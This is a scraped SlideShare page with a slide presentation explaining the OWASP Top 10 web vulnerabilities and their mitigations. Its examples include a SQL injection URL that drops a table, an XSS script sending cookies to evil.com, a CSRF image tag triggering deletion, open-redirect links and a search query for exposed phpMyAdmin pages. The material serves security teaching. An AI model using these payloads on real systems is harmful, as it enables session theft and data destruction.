SlideShare una empresa de Scribd logo

Presentation on Top 10 Vulnerabilities in Web Application

Descargar como PPTX, PDF
Md Mahfuzur Rahman
Md Mahfuzur Rahman

In this presentation I'm trying to describe the "Top 10 Vulnerabilities in Web Application" according to OWASP (Open Web Application Security Project). --The top 10 security mistakes that developers make --How to design software with an assurance of security

Tecnología
1 de 33
Presented By: Md Mahfuzur Rahman
 What is OWASP (Open Web Application Security Project)? ◦ http://owasp.org ◦ Worldwide non-profit focused on improving software security ◦ Reaches out to ALL developers: not just security professionals  Who am I? ◦ Jr. Software Engineer @IECL ◦ Student of Asian University of Bangladesh ◦ Here to share some knowledge  What will you learn? ◦ The top 10 security mistakes that developers make ◦ How to design software with an assurance of security
1) Injection 2) Broken Authentication and Session Management 3) Cross Site Scripting 4) Insecure Direct Object References 5) Cross Site Request Forgery (CSRF) 6) Security Misconfiguration 7) Insecure Cryptographic Storage 8) Failure to Restrict URL Access 9) Insufficient Transport Layer Protection 10) Unvalidated Redirects and Forwards
 Used when your app sends user-supplied data to other apps ◦ Database, Operating System, LDAP, Web Services  Hackers "inject" their code to run instead of yours ◦ To access unauthorized data, or completely take over remote application ◦ Example: SQL injection attack $query = "SELECT * FROM products WHERE id = “.$id;
 Code expects a nice parameter in the URL • http://example.com/products?id=123 • Hacker could instead supply this : http://example.com/products?id=';+DROP+TABLE+'pr oducts';
 Ensure that all parameters are validated before they are used.  Check verses exactly what input should be allowed.  Ideally, only allow the user to select among "safe" options ◦ no generic text allowed
 HTTP is a "stateless" protocol ◦ Nice and simple: HTTP request, HTTP response ◦ All data must be passed in the request every time  How do we store state? ◦ Client side with cookies ◦ Server side with sessions  Most apps place a "sessionId" in cookies, or in the URL ◦ Problem: now stealing sessionIds is just as good as stealing passwords!  Multiple ways to determine a session ID ◦ packet sniffing -- especially on an open WiFi access point ◦ HttpReferrer logs, if sessionId is in the URL
 Assume that a user stole a session ID ◦ Determine how bad this would be in your application  Use SSL everywhere! ◦ Makes it harder for people to “sniff” your session ID  If you cannot use SSL everywhere, use it for logins ◦ Have a cryptographically strong session ID  Good sessionIds should be very difficult to re-use ◦ Embed user IP address, user name, timestamp, and a secret ◦ Forces an attacker to spoof IP addresses to take over ◦ Prompt for re-login if IP changes during a session
 Sites must "cleanse" user input before displaying it  Hackers can create URLs to inject their own HTML onto the page ◦ can be used to do almost any kind of attack!!!  Example: JSP to draw HTML based on user input ◦ String html = "<input name='item' type='TEXT' value='" + request.getParameter("item") + "'>";
 Code expects a nice URL: ◦ http://example.com/buy?item=123  But a hacker could supply this: ◦ http://example.com/buy?item='><script>document.location='htt p://evil.com/steal/'+document.cookie</script>  Then, try to trick somebody to go to that URL ◦ Stolen cookies are frequently as good as stole passwords
 Never, ever, ever trust user-submitted content! ◦ URLs, comments threads, web forms  Properly "escape" any data before displaying it on web pages ◦ JavaScript parameters, URL parameters, STYLE elements ◦ Remove script tags, and possibly anything with a SRC attribute ◦ Use ESAPI to "cleanse" your HTML  Do not allow state-change from HTTP GET requests ◦ Otherwise, an IMG tag could cause you to lose all your data  Set the HttpOnly flag in your response headers ◦ Prevents document.cookie from working in JavaScript
 Assume my project id is 123  I see a link on “My Projects” page that goes here: ◦ http://example.com/projects/123  If I alter the URL, can I see other people’s projects? ◦ http://example.com/projects/124  Do you only restrict access in the web form?  What if I could "guess" the URL? Could I see the page? ◦ Don't trick yourself into thinking complex URLs are any more secure ◦ Security != Obscurity
 Every resource needs a security level ◦ What roles do you need to access certain items? ◦ Access Control Lists are easy to implement, but don’t always scale  All access to that resource should go through the same check ◦ What action are you taking, with what resource? ◦ Put it all in one common codebase for simplicity ◦ May need to run check multiple times, for sub-actions and sub- resources ◦ Unusual behavior? Have additional authentication questions/layers!  Front-end restriction is nice for usability, but not security  Back-end application must double-check access rights
 Most web applications depend on some kind of framework ◦ Weblogic, Spring, ADF, Ruby on Rails, Open Source Libraries ◦ JARs and JARs and JARs of fun...  What if your framework issued a security patch? ◦ Do you have a centralized policy for keeping dependencies up-to- date? ◦ How long would it take you to discover new code? ◦ How long would it take to recompile/test/redeploy?
 Do you know all security configurations in the framework? ◦ Odds are no... documentation is usually obtuse ◦ “Being helpful is a security hole”  Have you properly "hardened" your framework? ◦ Delete default users, disable unused services and ports
 Subscribe to newsletters and blog feeds to get patches ◦ Install the patches as quickly as possible  Do periodic scans to detect misconfiguration / missing patches  Disable features that are "nice" for developers, but "nasty" for security  Use automation to ensure patches are up-to-date ◦ If you can't verify it, it's not secure ◦ Can you prove glass is bulletproof without firing bullets at it?  Taking over websites shouldn't be this easy: ◦ http://www.google.com/search?q=inurl:SELECT+inurl:FROM+inurl :WHERE+intitle:phpmyadmin
 Bad guys get credit cards, personal identification, passwords or health records.  Your company could be fined or worse.
 Is any of this data stored in clear text long term, including backups of this data?  Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous.  Are any old / weak cryptographic algorithms used?  Are weak crypto keys generated, or is proper key management or rotation missing?  Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser?
 make sure you encrypt all sensitive data at rest and in transit in a manner that defends against these threats.  Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t have can’t be stolen.  Ensure strong standard algorithms and strong keys are used, and proper key management is in place.  Ensure passwords are stored with an algorithm specifically designed for password protection, such as bcrypt, PBKDF2, or scrypt.  Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data.
 Similar to #4: Insecure Direct Object Reference ◦ Need to block specific actions, even if no resource is identified  Example: my project is 123  I will see these URLs on my home page: ◦ http://example.com/project/123 ◦ http://example.com/user/getProjects/
 I could fish around and try other URLs as well: ◦ http://example.com/manager/getProjects/ ◦ http://example.com/admin/getProjects/  Would your application prevent this?  Same general issue: ◦ you have front-end security, but not back-end security
 Do authentication checks at least twice ◦ Front end UI, and back end Controller  Don't draw URLs to the page if the user cannot access them ◦ Bad usability ◦ Hackers might be tempted to fish around for vulnerabilities  Never assume a URL is allowed ◦ Do back-end checks for access, and state change
 Add even more layers as needed: ◦ Does all security information exist in the URL?  Can you authenticate right away?  Might you need to get half way through the request before you know what rights are needed? ◦ What if the user has access, but their behavior is unusual  should you prompt for password again, or perhaps for additional authorization?
 Evil sites can hijack your browser, and run secure request: 1) User logs into secure application behind the firewall http://example.com/myApp 2) User goes to "evil" website, or loads up "evil" HTML email 3) HTML contains this image: <img src="http://example.com/myApp/deleteEverything"></img>  With JavaScript and XSS, evil sites can completely take over your browser ◦ Can browse around your intranet, log into bank accounts ◦ Anything you are currently logged into ◦ Complete control, as long as you stay on the evil site  Unfortunate side-effect of Single-Sign-On
 All state change should require a unique token in the request  But if its in the URL, it's vulnerable! ◦ URLs are frequently logged, and can be "sniffed" ◦ avoid reusable tokens  General solution: ◦ All state change requires HTTP POST, not a GET ◦ Put one-time token in a hidden field on the web form ◦ After POST, do a GET redirect to a confirmation page
 What kind of token? ◦ Single-request tokens: safest, but a pain ◦ Session-based tokens hashed with session ID and action  Require multiple-level authentication ◦ If an action looks fishy, re-prompt user for login
 Some vulnerable components (e.g., framework libraries) can be identified and exploited with automated tools.  Attacker identifies a weak component through scanning or manual analysis.  He customizes the exploit as needed and executes the attack.
 Identify all components and the versions you are using, including all dependencies. (e.g. the versions plugin).  Monitor the security of these components in public databases, project mailing lists, and security mailing lists, and keep them up to date.  Establish security policies governing component use, such as requiring certain software development practices, passing security tests, and acceptable licenses.  Where appropriate, consider adding security wrappers around components to disable unused functionality and/ or secure weak or vulnerable aspects of the component.
 Most sites allow redirects to other sites, or pages within the site: ◦ http://example.com/redirect?url=google.com  But, open redirect pages can be used by "phishers" to create links to their site: ◦ http://example.com/redirect?url=evil.com  Link looks like it goes to "example.com", but it goes to "evil.com"  Or, can trick a site user into harming their own site: ◦ http://example.com/redirect?url=/admin.jsp?deleteEverything=tru e  Sometimes called "phishing holes"
 Simply avoid using redirects and forwards.  If used, don’t involve user parameters in calculating the destination. This can usually be done.  If destination parameters can’t be avoided, ensure that the supplied value is valid, and authorized for the user.  Restrict redirects to a limited number of "trusted" sites  Keep a list of all redirect URLs, and pass the ID in the request, instead of the URL ◦ http://example.com/redirect?urlId=123  Hash the URL with a secret, and pass the hash in the URL ◦ http://example.com/redirect?url=google.com&hash=a1b2c3
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web Application

Recomendados

Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFBrian Huff
 

Recomendados

Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFBrian Huff
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
Web security presentation
Web security presentationWeb security presentation
Web security presentationJohn Staveley
 
CIS14: Authentication: Who are You? You are What You Eat
CIS14: Authentication: Who are You? You are What You EatCIS14: Authentication: Who are You? You are What You Eat
CIS14: Authentication: Who are You? You are What You EatCloudIDSummit
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008Caleb Sima
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamSecrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamOWASP Delhi
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10InnoTech
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - IntroductionSQALab
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web ApplicationsSasha Goldshtein
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5Krishna T
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for DevelopersMike North
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearydrewz lin
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
Web security leeds sharp dot netnotts
Web security leeds sharp dot netnottsWeb security leeds sharp dot netnotts
Web security leeds sharp dot netnottsJohn Staveley
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 

Más contenido relacionado

La actualidad más candente

A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
Web security presentation
Web security presentationWeb security presentation
Web security presentationJohn Staveley
 
CIS14: Authentication: Who are You? You are What You Eat
CIS14: Authentication: Who are You? You are What You EatCIS14: Authentication: Who are You? You are What You Eat
CIS14: Authentication: Who are You? You are What You EatCloudIDSummit
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamSecrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamOWASP Delhi
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10InnoTech
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - IntroductionSQALab
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web ApplicationsSasha Goldshtein
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5Krishna T
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for DevelopersMike North
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearydrewz lin
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
Web security leeds sharp dot netnotts
Web security leeds sharp dot netnottsWeb security leeds sharp dot netnotts
Web security leeds sharp dot netnottsJohn Staveley
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
 

La actualidad más candente (20)

A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
 
Web security presentation
Web security presentationWeb security presentation
Web security presentation
 
CIS14: Authentication: Who are You? You are What You Eat
CIS14: Authentication: Who are You? You are What You EatCIS14: Authentication: Who are You? You are What You Eat
CIS14: Authentication: Who are You? You are What You Eat
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamSecrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web Applications
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for Developers
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011
 
Web security leeds sharp dot netnotts
Web security leeds sharp dot netnottsWeb security leeds sharp dot netnotts
Web security leeds sharp dot netnotts
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
 

Similar a Presentation on Top 10 Vulnerabilities in Web Application

Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a DatabaseJohn Ashmead
 
6 - Web Application Security.pptx
6 - Web Application Security.pptx6 - Web Application Security.pptx
6 - Web Application Security.pptxAlmaOraevi
 
Top Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.NetTop Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.Netalsmola
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Barry Dorrans
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Michael Pirnat
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramOpenDNS
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001Miguel Ibarra
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Jeremiah Grossman
 
CIS14: Authentication: Who are You? You are What You Eat
CIS14: Authentication: Who are You? You are What You EatCIS14: Authentication: Who are You? You are What You Eat
CIS14: Authentication: Who are You? You are What You EatCloudIDSummit
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptSilverGold16
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdfRavi Aggarwal
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 

Similar a Presentation on Top 10 Vulnerabilities in Web Application (20)

Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a Database
 
6 - Web Application Security.pptx
6 - Web Application Security.pptx6 - Web Application Security.pptx
6 - Web Application Security.pptx
 
Top Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.NetTop Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.Net
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training Program
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
 
CIS14: Authentication: Who are You? You are What You Eat
CIS14: Authentication: Who are You? You are What You EatCIS14: Authentication: Who are You? You are What You Eat
CIS14: Authentication: Who are You? You are What You Eat
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
 
Htaccess info
Htaccess infoHtaccess info
Htaccess info
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdf
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Web security uploadv1
Web security uploadv1Web security uploadv1
Web security uploadv1
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
 

Último

EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxRemote DBA Services
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
